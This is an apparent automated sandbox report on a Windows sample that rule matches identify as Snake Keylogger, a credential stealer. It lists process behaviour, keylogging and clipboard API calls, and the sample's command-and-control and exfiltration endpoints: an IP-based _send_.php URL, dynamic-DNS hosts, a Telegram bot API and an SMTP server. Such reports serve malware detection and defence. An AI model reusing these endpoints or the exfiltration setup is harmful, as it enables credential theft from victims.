Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 20:13:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 20:13:57 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.00000000030C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: acrorrheuma.exe, 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, acrorrheuma.exe, 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: acrorrheuma.exe, 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2532846101.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: acrorrheuma.exe, 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2532846101.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000007.00000002.2532846101.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: acrorrheuma.exe, 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, acrorrheuma.exe, 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000007.00000002.2557514902.0000000008EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oenq
Source: RegSvcs.exe, 00000007.00000002.2532846101.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000A.00000002.2533215372.0000000003284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: acrorrheuma.exe, 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2532846101.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: acrorrheuma.exe, 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, acrorrheuma.exe, 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.00000000030C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: acrorrheuma.exe, 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2532846101.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, acrorrheuma.exe, 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.0000000003071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2533215372.00000000030C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49736 version: TLS 1.2

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

3_2_00E14164

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		3_2_00E14164
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_00514164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		6_2_00514164

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E13F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

3_2_00E13F66

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E0001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

3_2_00E0001C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		3_2_00E2CABC
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		6_2_0052CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: acrorrheuma.exe PID: 732, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7556, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: acrorrheuma.exe PID: 7212, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: This is a third-party compiled AutoIt script.	3_2_00DA3B3A
Source: drRbNknjyb.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: drRbNknjyb.exe, 00000003.00000002.1286736785.0000000000E54000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_671778d5-3
Source: drRbNknjyb.exe, 00000003.00000002.1286736785.0000000000E54000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_204f3d51-d
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: This is a third-party compiled AutoIt script.	6_2_004A3B3A
Source: acrorrheuma.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: acrorrheuma.exe, 00000006.00000002.1306184995.0000000000554000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_47ea194e-1
Source: acrorrheuma.exe, 00000006.00000002.1306184995.0000000000554000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_7a0d2037-e
Source: acrorrheuma.exe, 00000009.00000002.1424287594.0000000000554000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a800f2f9-9
Source: acrorrheuma.exe, 00000009.00000002.1424287594.0000000000554000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_883700e9-6

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DA3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	3_2_00DA3633
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	3_2_00E2C1AC
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	3_2_00E2C498
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	3_2_00E2C5FE
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2C57D SendMessageW,NtdllDialogWndProc_W,	3_2_00E2C57D
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2C8BE NtdllDialogWndProc_W,	3_2_00E2C8BE
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2C88F NtdllDialogWndProc_W,	3_2_00E2C88F
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2C860 NtdllDialogWndProc_W,	3_2_00E2C860
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2C93E ClientToScreen,NtdllDialogWndProc_W,	3_2_00E2C93E
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2C909 NtdllDialogWndProc_W,	3_2_00E2C909
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	3_2_00E2CABC
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2CA7C GetWindowLongW,NtdllDialogWndProc_W,	3_2_00E2CA7C
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DA1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	3_2_00DA1290
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DA1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,7493C8D0,NtdllDialogWndProc_W,	3_2_00DA1287
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2D3B8 NtdllDialogWndProc_W,	3_2_00E2D3B8
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	3_2_00E2D43E
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DA16DE GetParent,NtdllDialogWndProc_W,	3_2_00DA16DE
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DA16B5 NtdllDialogWndProc_W,	3_2_00DA16B5
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DA167D NtdllDialogWndProc_W,	3_2_00DA167D
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2D78C NtdllDialogWndProc_W,	3_2_00E2D78C
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DA189B NtdllDialogWndProc_W,	3_2_00DA189B
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2BC5D NtdllDialogWndProc_W,CallWindowProcW,	3_2_00E2BC5D
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2BF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	3_2_00E2BF8C
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E2BF30 NtdllDialogWndProc_W,	3_2_00E2BF30
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	6_2_004A3633
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	6_2_0052C1AC
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	6_2_0052C498
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052C57D SendMessageW,NtdllDialogWndProc_W,	6_2_0052C57D
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	6_2_0052C5FE
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052C860 NtdllDialogWndProc_W,	6_2_0052C860
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052C88F NtdllDialogWndProc_W,	6_2_0052C88F
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052C8BE NtdllDialogWndProc_W,	6_2_0052C8BE
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052C909 NtdllDialogWndProc_W,	6_2_0052C909
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052C93E ClientToScreen,NtdllDialogWndProc_W,	6_2_0052C93E
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052CA7C GetWindowLongW,NtdllDialogWndProc_W,	6_2_0052CA7C
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	6_2_0052CABC
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,7493C8D0,NtdllDialogWndProc_W,	6_2_004A1287
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	6_2_004A1290
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052D3B8 NtdllDialogWndProc_W,	6_2_0052D3B8
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	6_2_0052D43E
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A167D NtdllDialogWndProc_W,	6_2_004A167D
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A16DE GetParent,NtdllDialogWndProc_W,	6_2_004A16DE
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A16B5 NtdllDialogWndProc_W,	6_2_004A16B5
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052D78C NtdllDialogWndProc_W,	6_2_0052D78C
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A189B NtdllDialogWndProc_W,	6_2_004A189B
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052BC5D NtdllDialogWndProc_W,CallWindowProcW,	6_2_0052BC5D
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052BF30 NtdllDialogWndProc_W,	6_2_0052BF30
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0052BF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	6_2_0052BF8C

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E0A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

3_2_00E0A1EF

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DF8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,740A5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

3_2_00DF8310

